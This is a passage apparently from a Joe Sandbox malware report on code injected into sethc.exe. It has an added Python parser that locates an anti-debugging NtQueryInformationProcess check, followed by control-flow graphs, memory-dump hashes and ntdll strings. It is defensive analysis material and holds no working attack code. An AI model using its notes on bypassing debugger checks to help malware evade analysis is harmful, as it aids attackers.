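The `control_flow_graph` listings above are a flattened edge list: each basic block is a decimal id followed by its address range, then its `call` targets (`* N` marks a call site repeated N times) and any import names the sandbox resolved in that block, and `a->b` tokens are edges. The Python below is an added example, not part of the Joe Sandbox report, that parses this notation, maps the `NtQueryInformationProcess.NTDLL ref: 043DF1E6` annotation back to its block, and walks the shortest path from the entry block to that call in the code injected into sethc.exe. The embedded string is an abridged, hand-copied excerpt of the third graph above (constructed for the example), and the token rules are inferred from the listing rather than taken from a published grammar.

```python
import re
from collections import deque
from dataclasses import dataclass, field

# Abridged excerpt (constructed for this example) of the third control_flow_graph
# listing above, for the code injected into sethc.exe at 043D0000.
CFG_EXCERPT = (
    "control_flow_graph 275 43df033-43df04b 276 43df04d-43df064 call 43e1318 275->276 "
    "277 43df069-43df089 call 43e1338 call 43dd028 275->277 276->277 "
    "283 43df08f-43df198 call 43def58 call 43e1338 call 43e52a4 call 43d0398 call 43e08e8 "
    "call 43d0398 call 43e08e8 call 43e3008 277->283 284 43df686-43df691 277->284 "
    "301 43df19e-43df1fc call 43d0398 call 43e08e8 NtQueryInformationProcess call 43e1338 283->301 "
    "302 43df67a-43df681 call 43def58 283->302 309 43df201-43df238 call 43d0398 call 43e08e8 301->309 "
    "302->284 338 43df38f-43df48b call 43d0398 call 43e08e8 call 43e52ea call 43d0398 "
    "call 43e08e8 call 43e3328 call 43e12e8 * 3 call 43e52dc"
)

ADDR_RANGE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")
EDGE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    ident: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # callee addresses, one entry per call site
    apis: list = field(default_factory=list)   # import names the sandbox resolved in this block


def parse_cfg(text):
    """Parse one 'control_flow_graph ...' line into ({id: Block}, [(src, dst), ...])."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RANGE.match(tokens[i + 1]):
            # a decimal id followed by 'lo-hi' opens a new basic block
            lo, hi = tokens[i + 1].split("-")
            current = Block(int(tok), int(lo, 16), int(hi, 16))
            blocks[current.ident] = current
            i += 2
        elif current is None:
            raise ValueError(f"token {tok!r} before the first block")
        elif tok == "call":
            current.calls.append(int(tokens[i + 1], 16))
            i += 2
        elif tok == "*":
            # 'call X * N': the preceding call site is repeated N times in the block
            current.calls.extend([current.calls[-1]] * (int(tokens[i + 1]) - 1))
            i += 2
        else:
            current.apis.append(tok)  # bare token such as NtQueryInformationProcess
            i += 1
    return blocks, edges


def block_containing(blocks, addr):
    """Map an 'APIs ... ref: 043DF1E6' style address back to its basic block id."""
    for b in blocks.values():
        if b.start <= addr <= b.end:
            return b.ident
    return None


def shortest_path(blocks, edges, entry, want):
    """BFS over block edges from entry to the first block satisfying want()."""
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    parent, queue = {entry: None}, deque([entry])
    while queue:
        n = queue.popleft()
        if n in blocks and want(blocks[n]):
            path = []
            while n is not None:
                path.append(n)
                n = parent[n]
            return path[::-1]
        for s in succ.get(n, []):
            if s not in parent:
                parent[s] = n
                queue.append(s)
    return None


def path_to_api(text, api):
    """Block ids from the entry block to the first block that calls the named API."""
    blocks, edges = parse_cfg(text)
    entry = next(iter(blocks))  # the listing names the entry block first
    return shortest_path(blocks, edges, entry, lambda b: api in b.apis)


if __name__ == "__main__":
    blocks, _ = parse_cfg(CFG_EXCERPT)
    print("block holding 043DF1E6:", block_containing(blocks, 0x043DF1E6))
    print("entry -> NtQueryInformationProcess:", path_to_api(CFG_EXCERPT, "NtQueryInformationProcess"))
```

On the excerpt the API reference at 043DF1E6 resolves to block 301, and the entry block reaches it in three edges (275, 277, 283, 301); the unreachable blocks that fall inside the range but sit on the 276 or 302 branches are left out by the BFS. Running the same parser over the full listing tells you how deep into the injected code the debugger check sits before any other externally visible behaviour, which is useful when deciding where to break or patch in a debugger.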
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 48238022c89376aefd687f702892f5e8935b4f8b371c961de2ce2ee5dfab6a46
                                                          • Instruction ID: 08c399af83129a953e507c0ca024f5de279ee1208902e556ae50221a23a32073
                                                          • Opcode Fuzzy Hash: 48238022c89376aefd687f702892f5e8935b4f8b371c961de2ce2ee5dfab6a46
                                                          • Instruction Fuzzy Hash: 3690023160510412F51071584624706204597D0245F61CC15A0415569DC7A5D95675A2

                                                          Control-flow Graph

                                                          control_flow_graph 422 4502c30-4502c3c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d68f87ad198fb531767e24ce14d3b2f5bd86ff666e928207ba013b44c26c4f66
                                                          • Instruction ID: 2b0381aa7f583e58419809d3e0a715dd70a8e34ab581f6d54250a63594bcda69
                                                          • Opcode Fuzzy Hash: d68f87ad198fb531767e24ce14d3b2f5bd86ff666e928207ba013b44c26c4f66
                                                          • Instruction Fuzzy Hash: 0A90022921300012F5907158551860A104597D1246F91DC19A0006559CCA25D86E7321

                                                          Control-flow Graph

                                                          control_flow_graph 423 4502cf0-4502cfc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 005c36ea88379df309f1fa185000f5c2713cef0e7d4355b528818ef90b3a6b27
                                                          • Instruction ID: a085a8fb2dd8698b07698f95f5742a9259d10f1e91bcc0065f8b85d8e218aa75
                                                          • Opcode Fuzzy Hash: 005c36ea88379df309f1fa185000f5c2713cef0e7d4355b528818ef90b3a6b27
                                                          • Instruction Fuzzy Hash: FF900221242041627955B15845145075046A7E0285791C816A1405951CC636E85BF621

                                                          Control-flow Graph

                                                          control_flow_graph 424 4502d10-4502d1c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 39322116d238619a17ccb3f8bc13b4cd9e33893f134497d40b8bbba9fb8b2f83
                                                          • Instruction ID: 0b6a35b0a3f75244bbda63e29d5bc4e41ceb4373b24cdd066c0fc809dacea7c2
                                                          • Opcode Fuzzy Hash: 39322116d238619a17ccb3f8bc13b4cd9e33893f134497d40b8bbba9fb8b2f83
                                                          • Instruction Fuzzy Hash: 5290023120100423F52171584614707104997D0285F91CC16A0415559DD766D957B121

                                                          Control-flow Graph

                                                          control_flow_graph 425 4502e50-4502e5c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3774264d1fb2dc5d275a5009fc901c3138b337bb80fde9340d99d2be6ca9715a
                                                          • Instruction ID: 9877fca1a1672aeea89775037f9c612fe25f50aa3427d6105f49456b6db111b9
                                                          • Opcode Fuzzy Hash: 3774264d1fb2dc5d275a5009fc901c3138b337bb80fde9340d99d2be6ca9715a
                                                          • Instruction Fuzzy Hash: 1690026134100452F51071584524B061045D7E1345F51C819E1055555DC729DC577126
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 31247f94202e98dbab03775b8757b0dae0838ccf2dc350339037ca604540f769
                                                          • Instruction ID: 96675bc9015238f1fedb191fd06759426d782fea3def32f994dd0aabef47cacc
                                                          • Opcode Fuzzy Hash: 31247f94202e98dbab03775b8757b0dae0838ccf2dc350339037ca604540f769
                                                          • Instruction Fuzzy Hash: A490022121180052F61075684D24B07104597D0347F51C919A0145555CCA25D8667521

                                                          Control-flow Graph

                                                          control_flow_graph 415 45029f0-45029fc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 72312af11de18fb6dec8163a039a345581d6693def34e933627306c0c111dc3f
                                                          • Instruction ID: 2a29681d0b6fe8de7b76d8994e4426e1911f0193b5d16fa3f5a71ac8b87b197c
                                                          • Opcode Fuzzy Hash: 72312af11de18fb6dec8163a039a345581d6693def34e933627306c0c111dc3f
                                                          • Instruction Fuzzy Hash: 72900225211000133515B5580714507108697D5395351C825F1006551CD731D8667121

                                                          Control-flow Graph

                                                          control_flow_graph 416 4502a80-4502a8c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d0a3162d176abf51346eaec85acefe63167caf50245c13829053bd167211e82d
                                                          • Instruction ID: 98384e92d4797c9ffb783deb06daab96bd5d55fb31f1422fceac8e2d3bde5987
                                                          • Opcode Fuzzy Hash: d0a3162d176abf51346eaec85acefe63167caf50245c13829053bd167211e82d
                                                          • Instruction Fuzzy Hash: 1990026120200013751571584524616504A97E0245B51C825E1005591DC635D8967125

                                                          Control-flow Graph

                                                          control_flow_graph 418 4502b10-4502b1c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: bba90090b817275b960650ed5eb49d642f19f24f927efa7cd987ff0c5cb758cd
                                                          • Instruction ID: c86f9789e3e67166976650d8dd4aa4541cca460fe2466ec1b1566555765b7957
                                                          • Opcode Fuzzy Hash: bba90090b817275b960650ed5eb49d642f19f24f927efa7cd987ff0c5cb758cd
                                                          • Instruction Fuzzy Hash: 8B90023120100812F5907158451464A104597D1345F91C819A0016655DCB25DA5E77A1

                                                          Control-flow Graph

                                                          control_flow_graph 417 4502b00-4502b0c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 370fb9c61f37cc3db535ff89912d9032470bfadb39d7b5466a82d80993fa62a7
                                                          • Instruction ID: e03302fdab4a8fb98b646f28e9f7ccf4159e2c06f294f8e60c73283b37bd76b8
                                                          • Opcode Fuzzy Hash: 370fb9c61f37cc3db535ff89912d9032470bfadb39d7b5466a82d80993fa62a7
                                                          • Instruction Fuzzy Hash: 7990023120504852F55071584514A46105597D0349F51C815A0055695DD735DD5AB661

                                                          Control-flow Graph

                                                          control_flow_graph 421 4502bc0-4502bcc LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 7ba2dab5d815fd4f013592f00feab4aecbf68175ab3b12f63fd4335a98fb4018
                                                          • Instruction ID: 876240dd12421c98c86dcfadd62197aae11905035ec171978d6a76e2231af09f
                                                          • Opcode Fuzzy Hash: 7ba2dab5d815fd4f013592f00feab4aecbf68175ab3b12f63fd4335a98fb4018
                                                          • Instruction Fuzzy Hash: F290023120100412F51075985518646104597E0345F51D815A5015556EC775D8967131

                                                          Control-flow Graph

                                                          control_flow_graph 420 4502b90-4502b9c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b7f4e68d767c8624c82b6d44ca32807e88ccf3c8990cef5de5120bdf1ca2fd00
                                                          • Instruction ID: 114ab992c1ad599dd910b388b418f560fae63382f59b4672e1ec12caa2240132
                                                          • Opcode Fuzzy Hash: b7f4e68d767c8624c82b6d44ca32807e88ccf3c8990cef5de5120bdf1ca2fd00
                                                          • Instruction Fuzzy Hash: DC90023120108812F5207158851474A104597D0345F55CC15A4415659DC7A5D8967121

                                                          Control-flow Graph

                                                          control_flow_graph 419 4502b80-4502b8c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f06b510d6fa8bdf4926cc25dc59830b88495835ee15a43e38424680d4835cd25
                                                          • Instruction ID: cae1a82bbb070d55413bde4eeebca01d8b2a9280f3429f1fddf1115a2ad7efd5
                                                          • Opcode Fuzzy Hash: f06b510d6fa8bdf4926cc25dc59830b88495835ee15a43e38424680d4835cd25
                                                          • Instruction Fuzzy Hash: 6B90023120100852F51071584514B46104597E0345F51C81AA0115655DC725D8567521

                                                          Control-flow Graph

                                                          control_flow_graph 411 4502b2a-4502b2f 412 4502b31-4502b38 411->412 413 4502b3f-4502b46 LdrInitializeThunk 411->413
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e6276fa7ab28728a456950de0ba33fe956762c699172460cbdb1da0e01012e11
                                                          • Instruction ID: 164e5a33bbd923cc29bd80ef2e62ccfe2719504d2aa39ae80aaf646cdf9c76e2
                                                          • Opcode Fuzzy Hash: e6276fa7ab28728a456950de0ba33fe956762c699172460cbdb1da0e01012e11
                                                          • Instruction Fuzzy Hash: 4FB09B71D014C5D5FB21EB60570C717794077D0745F15C455E1460685E4738D495F175
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46413558176.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_190000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: a
                                                          • API String ID: 0-3904355907
                                                          • Opcode ID: dba1d9ec92ac30fc22ba4fe2b419aab5a44d57008d1f369585167b006b604dd8
                                                          • Instruction ID: 2213afbb76398a4c31e1e2b6c6a6d72caeab0347daa68d5ed8b6ff83fb7f5281
                                                          • Opcode Fuzzy Hash: dba1d9ec92ac30fc22ba4fe2b419aab5a44d57008d1f369585167b006b604dd8
                                                          • Instruction Fuzzy Hash: 2A114862E14A42DFDB02DB70C8A52DABF62EF85B19B2E0599D0404A013DF715456CF84
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414385536.00000000043D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_43d0000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d88f2374b49e7d4b383fc7da09f8e76a2727e0ce3eaf4da2cd87d8c805e46d6
                                                          • Instruction ID: f27754249dfc528f0f430cb0c58d1944c3ea307806219bfa3988c5f4b36ffb2e
                                                          • Opcode Fuzzy Hash: 2d88f2374b49e7d4b383fc7da09f8e76a2727e0ce3eaf4da2cd87d8c805e46d6
                                                          • Instruction Fuzzy Hash: D541F47261DF094FD36CAE68A481276B3E2FB85308F10252DC886C3252EA74F8428784
                                                          Strings
                                                          • Execute=1, xrefs: 0453451E
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04534530
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0453454D
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04534592
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04534507
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04534460
                                                          • ExecuteOptions, xrefs: 045344AB
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 9d015ff616cc307a91924d5319d1324c19f36222c1f18ccacc285f2a56fece9e
                                                          • Instruction ID: eeb3bf11b5764e8fc95545e6f25b0f14d29a0aaa1a383a332251ac85304bf92f
                                                          • Opcode Fuzzy Hash: 9d015ff616cc307a91924d5319d1324c19f36222c1f18ccacc285f2a56fece9e
                                                          • Instruction Fuzzy Hash: D451FB31A002197AFF20AE94DC85FAE73A8FF58714F1404AAD705A7281E774BE55DF60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.46414434941.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Offset: 04490000, based on PE: true
                                                          • Associated: 00000004.00000002.46414434941.00000000045B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.46414434941.00000000045BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_4490000_sethc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$@
                                                          • API String ID: 0-1194432280
                                                          • Opcode ID: 77d4f49c76fdd7509e050114ffd9e265aea991e91ffdcb7b3bb082c23133cc1e
                                                          • Instruction ID: 22efc7fc985e187b6bf3fd672e1d3e904ec352f3870629d5f36d41d99571a37e
                                                          • Opcode Fuzzy Hash: 77d4f49c76fdd7509e050114ffd9e265aea991e91ffdcb7b3bb082c23133cc1e
                                                          • Instruction Fuzzy Hash: 9D813BB5D002699BDB318F54CD45BEEB6B8BB08714F0441DBE909B7280E770AE84DFA1